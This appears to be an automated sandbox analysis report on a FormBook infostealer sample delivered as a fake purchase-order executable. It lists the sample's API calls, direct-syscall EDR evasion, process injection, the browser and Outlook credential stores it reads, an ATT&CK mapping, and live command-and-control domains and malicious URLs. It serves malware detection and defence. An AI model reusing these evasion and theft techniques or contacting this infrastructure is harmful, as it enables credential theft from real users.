            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 6724Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PO# Q919240.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E86008Jump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\PO# Q919240.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO# Q919240.exe"Jump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: PO# Q919240.exe, fALrZoEgBHis.exe, 00000003.00000002.2706935691.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000000.1576488958.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000000.1735897444.00000000016A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: fALrZoEgBHis.exe, 00000003.00000002.2706935691.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000000.1576488958.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000000.1735897444.00000000016A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: fALrZoEgBHis.exe, 00000003.00000002.2706935691.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000000.1576488958.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000000.1735897444.00000000016A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: fALrZoEgBHis.exe, 00000003.00000002.2706935691.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000000.1576488958.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000000.1735897444.00000000016A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: PO# Q919240.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PO# Q919240.exeBinary or memory string: WIN_XP
            Source: PO# Q919240.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: PO# Q919240.exeBinary or memory string: WIN_XPe
            Source: PO# Q919240.exeBinary or memory string: WIN_VISTA
            Source: PO# Q919240.exeBinary or memory string: WIN_7
            Source: PO# Q919240.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515409 Sample: PO# Q919240.exe Startdate: 22/09/2024 Architecture: WINDOWS Score: 100 28 www.woshop.online 2->28 30 www.tekilla.wtf 2->30 32 10 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 8 other signatures 2->48 10 PO# Q919240.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 13 svchost.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 fALrZoEgBHis.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 fALrZoEgBHis.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.kexweb.top 63.250.47.40, 49727, 49728, 49729 NAMECHEAP-NETUS United States 22->34 36 bola88site.one 172.96.191.39, 49719, 49720, 49721 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Canada 22->36 38 4 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO# Q919240.exe71%ReversingLabsWin32.Trojan.Autoitinject
            PO# Q919240.exe74%VirustotalBrowse
            PO# Q919240.exe100%AviraHEUR/AGEN.1321685
            PO# Q919240.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.elsupertodo.net3%VirustotalBrowse
            webredir.vip.gandi.net0%VirustotalBrowse
            www.kexweb.top2%VirustotalBrowse
            bola88site.one0%VirustotalBrowse
            omexai.info0%VirustotalBrowse
            www.omexai.info0%VirustotalBrowse
            www.bola88site.one0%VirustotalBrowse
            www.languagemodel.pro1%VirustotalBrowse
            www.kxshopmr.store0%VirustotalBrowse
            www.woshop.online2%VirustotalBrowse
            www.tekilla.wtf0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.omexai.info/7xi5/100%Avira URL Cloudmalware
            https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryY100%Avira URL Cloudmalware
            http://www.kexweb.top/3bdq/0%Avira URL Cloudsafe
            http://www.languagemodel.pro/nxfn/0%Avira URL Cloudsafe
